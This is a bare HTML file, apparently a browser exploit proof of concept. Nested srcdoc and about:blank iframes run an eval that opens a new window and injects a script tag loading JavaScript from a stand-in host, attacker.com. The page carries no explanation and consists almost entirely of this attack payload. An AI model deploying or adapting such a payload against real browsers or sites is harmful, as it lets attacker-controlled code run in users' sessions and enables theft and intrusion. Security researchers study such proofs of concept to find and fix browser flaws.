<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe srcdoc="<iframe id=GGGGIuUfZGGGG src=about:blank></iframe>
<script>
window.onload = function() {
    GGGGIuUfZGGGG.onload=_=>GGGGIuUfZGGGG.contentWindow.eval('w=window.open(`about:blank`); w.document.write(`<script src=https://attacker.com/static/static.js><\/script>`);');GGGGIuUfZGGGG.contentWindow.location.reload();
};
</script>">
</iframe>
</body>
</html>